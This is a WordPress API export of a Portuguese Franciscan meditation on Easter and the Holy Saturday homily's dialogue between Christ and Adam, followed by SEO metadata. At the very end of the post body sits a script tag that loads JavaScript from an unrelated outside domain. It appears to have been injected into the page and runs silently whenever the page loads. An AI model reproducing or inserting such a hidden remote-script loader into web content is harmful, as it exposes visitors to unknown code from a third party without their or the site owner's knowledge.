{"id":16109,"date":"2012-05-03T14:53:52","date_gmt":"2012-05-03T17:53:52","guid":{"rendered":"http:\/\/new.franciscanos.org.br\/?p=16109"},"modified":"2020-05-22T10:01:38","modified_gmt":"2020-05-22T13:01:38","slug":"aquele-que-dormia-na-morte-despertou-para-a-vida","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/","title":{"rendered":"Aquele que dormia na morte despertou para a vida"},"content":{"rendered":"<p><strong>Por\u00a0<strong>Frei Almir Ribeiro Guimar\u00e3es<\/strong><\/strong><\/p>\n<p><strong><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/05\/cristo_g03.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"alignright size-full wp-image-17041\" title=\"Chagas de Cristo\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/05\/cristo_g03.jpg\" alt=\"\" width=\"400\" height=\"602\" \/><\/a>1.\u00a0<\/strong>Estamos ainda vivendo as alegrias do belo tempo pascal.\u00a0 Durante um tempo fixamos nosso olhar no sono mortal do Senhor. Nas \u00faltimas semanas temos diante de n\u00f3s a vida nova, o despertar do Cristo. Nunca cessamos de meditar no amor do Senhor Jesus, cuja express\u00e3o definitiva \u00e9 o dom da vida que fez por\u00a0 n\u00f3s no alto da cruz naquela sexta-feira das dores e do amor crucificado.\u00a0 N\u00e3o temos outra coisa a fazer sen\u00e3o mergulhar nessa fornalha de caridade que \u00e9 o peito aberto do Senhor pela lan\u00e7a, esse cora\u00e7\u00e3o fissurado, essa fonte de vida da qual manaram dois rios: um filete de sangue e outro de \u00e1gua.\u00a0 Uma espl\u00eandida e profunda \u00a0<em>Homilia do grande S\u00e1bado Santo<\/em> adota o g\u00eanero liter\u00e1rio de uma conversa entre Jesus e Ad\u00e3o. No dia em que Cristo desce\u00a0 \u00e0 mans\u00e3o dos mortos, no s\u00e1bado do descanso e do sil\u00eancio, o que morrera vai abrir as portas da mans\u00e3o dos mortos e dialoga com o primeiro homem.<\/p>\n<p><strong>2.\u00a0\u00a0 <\/strong>Bel\u00edssimas palavras de Cristo dirigidas a Ad\u00e3o: \u00a0\u201cV\u00ea em meu rosto os escarros que por ti recebi, para restituir-te o \u00a0sopro da vida original. V\u00ea em minha face as bofetadas que levei para restaurar, conforme \u00e0 minha imagem, tua beleza corrompida\u201d.\u00a0 Caminhando pelas estradas da vida, n\u00f3s que fomos criados \u00e0 imagem do Alt\u00edssimo e ficamos belos com as \u00e1guas do\u00a0 batismo, ainda sentimos nosso rosto interior sem beleza. Leva tempo nosso nascimento definitivo. \u00a0Faz bem ouvir esse que visita a mans\u00e3o dos mortos para transfigurar nossa vida.<\/p>\n<p><strong>3.\u00a0\u00a0 <\/strong>E o devoto do Senhor se extasia ao ouvir: \u201cV\u00ea em minhas costas as marcas dos a\u00e7oites que suportei por ti para retirar de teus ombros o peso dos pecados. V\u00ea minhas m\u00e3os fortemente pregadas \u00e0 \u00e1rvore da cruz, por causa de ti, como outrora estendeste levianamente as tuas m\u00e3os para a \u00e1rvore do para\u00edso\u201d. Lenho, madeira, cruz, \u00e1rvore do meio do para\u00edso&#8230; O Senhor havia pedido que Ad\u00e3o lhe fosse fiel, que n\u00e3o tocasse naquilo que iria destru\u00ed-lo, que n\u00e3o se considerasse\u00a0 \u201cdeus\u201d.\u00a0 Houve a terr\u00edvel decis\u00e3o de o homem querer ser igual a Deus. A \u00e1rvore do para\u00edso \u00e9 colocada ao lado de uma outra \u00e1rvore, a \u00e1rvore da cruz, que carregou o mais doce de todos os frutos, o filho da Virgem Maria, aquele que veio para obedecer ao Pai, para fazer a vontade do Pai e assim ser ele o fruto novo da nova \u00e1rvore da cruz.\u00a0 Quando olhamos para a cruz com o mais sincero e profundo olhar do cora\u00e7\u00e3o sentimos o al\u00edvio do perd\u00e3o das loucuras que nos fizeram seres med\u00edocres e ingratos para com\u00a0 aquele que nos amou desde toda a eternidade. Tudo isso acontece quando vemos as m\u00e3os do Senhor pregadas \u00e0 \u00e1rvore da vida que \u00e9 a cruz.<\/p>\n<p><strong>4.\u00a0\u00a0 <\/strong>Prestemos aten\u00e7\u00e3o num outro par\u00e1grafo dessa deslumbrante homilia para um S\u00e1bado Santo:\u00a0 \u201cAdormeci na cruz e por tua causa a lan\u00e7a penetrou no meu lado, como Eva surgiu do teu, ao adormeceres no para\u00edso. Meu lado curou a dor do teu lado. Meu sono vai arrancar-te do sono da morte.\u00a0 Minha lan\u00e7a deteve a lan\u00e7a que estava dirigida contra ti\u201d.\u00a0 O autor reflete sobre o \u201clado\u201d:\u00a0 o lado de Cristo e o lado de Ad\u00e3o.\u00a0 Lado do cora\u00e7\u00e3o, cora\u00e7\u00e3o que \u00e9 s\u00edmbolo da vida e do que a pessoa tem de mais importante.\u00a0 Cora\u00e7\u00e3o, que fica no lado do corpo e lado que foi tocado pela lan\u00e7a do soldado quando Jesus j\u00e1 estava morto.\u00a0 Quando tudo havia come\u00e7ado, \u00a0o Senhor havia criado Ad\u00e3o. Parecia que faltava alguma coisa:\u00a0 um ser que fosse companheiro.\u00a0 Ad\u00e3o percorreu os\u00a0 caminhos do Eden e n\u00e3o encontrou ningu\u00e9m que pudesse \u00a0ser igual a ele para fazer a profunda experi\u00eancia do amor na alteridade.<\/p>\n<p><strong>5.\u00a0\u00a0 <\/strong>O Senhor adormeceu no alto da cruz.\u00a0 A morte muitas vezes \u00e9 descrita como um sono.\u00a0 Na verdade, normalmente falando, ningu\u00e9m desperta do sono da morte.\u00a0 Jesus foi arrancado desse\u00a0 sono pela\u00a0 for\u00e7a do Pai.\u00a0 Enquanto dormia na cruz\u00a0 penetrou a espada no lado do Senhor.\u00a0 Do lado de Ad\u00e3o nasceu Eva. Quando este despertou do sono vive imensa alegria que n\u00e3o cabe no seu peito. Jesus tem tamb\u00e9m seu lado tocado e aberto e dele sai a Esposa que \u00e9 a Igreja, essa multid\u00e3o de homens e de mulheres que lavaram suas vestes no sangue do Cordeiro e que se tornam\u00a0 do Senhor e manter\u00e3o com ele um relacionamento esponsal.\u00a0 O Esposo\u00a0 e\u00a0 a Esposa trocar\u00e3o palavras de amor. Haver\u00e1 esse banquete sempre nupcial do Cordeiro que \u00e9 a Eucaristia.\u00a0 O despertar de Cristo arranca o homem da morte e o coloca nas alamedas da casa das n\u00fapcias eternas.<\/p>\n<p><strong>6.<\/strong> Para concluir retomamos o luminoso texto desta homilia: \u201cEst\u00e1 preparado o trono dos querubins, prontos e a postos os mensageiros, constru\u00eddo o leito nupcial, preparado o banquete, as mans\u00f5es e os tabern\u00e1culos eternos adornados, abertos os tesouros de todos os bens e o\u00a0 reino dos c\u00e9us preparado para ti desde toda a eternidade.\u201d<\/p>\n<p>Obs.: <em>As cita\u00e7\u00f5es entre aspas foram tiradas da\u00a0 Liturgia das Horas II, p, 439.440.<\/em><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1\u00aa Sexta-feira do m\u00eas<\/p>\n","protected":false},"author":1,"featured_media":184566,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105],"tags":[106,30],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"1\u00aa Sexta-feira do m\u00eas\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/\" \/>\n<meta property=\"og:site_name\" content=\"Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2012-05-03T17:53:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-22T13:01:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2012\/05\/cristo_g03.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"602\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/\",\"name\":\"Vida Crist\u00e3 - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/\",\"name\":\"Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\"},\"datePublished\":\"2012-05-03T17:53:52+00:00\",\"dateModified\":\"2020-05-22T13:01:38+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/vidacrista\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aquele que dormia na morte despertou para a vida\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/","og_locale":"pt_BR","og_type":"article","og_title":"Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos","og_description":"1\u00aa Sexta-feira do m\u00eas","og_url":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/","og_site_name":"Vida Crist\u00e3 - Franciscanos","article_published_time":"2012-05-03T17:53:52+00:00","article_modified_time":"2020-05-22T13:01:38+00:00","og_image":[{"width":800,"height":602,"url":"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2012\/05\/cristo_g03.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website","url":"https:\/\/franciscanos.org.br\/vidacrista\/","name":"Vida Crist\u00e3 - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/","url":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/","name":"Aquele que dormia na morte despertou para a vida - Vida Crist\u00e3 - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website"},"datePublished":"2012-05-03T17:53:52+00:00","dateModified":"2020-05-22T13:01:38+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/vidacrista\/aquele-que-dormia-na-morte-despertou-para-a-vida\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/vidacrista\/"},{"@type":"ListItem","position":2,"name":"Aquele que dormia na morte despertou para a vida"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/16109"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/comments?post=16109"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/16109\/revisions"}],"predecessor-version":[{"id":178044,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/16109\/revisions\/178044"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media\/184566"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media?parent=16109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/categories?post=16109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/tags?post=16109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}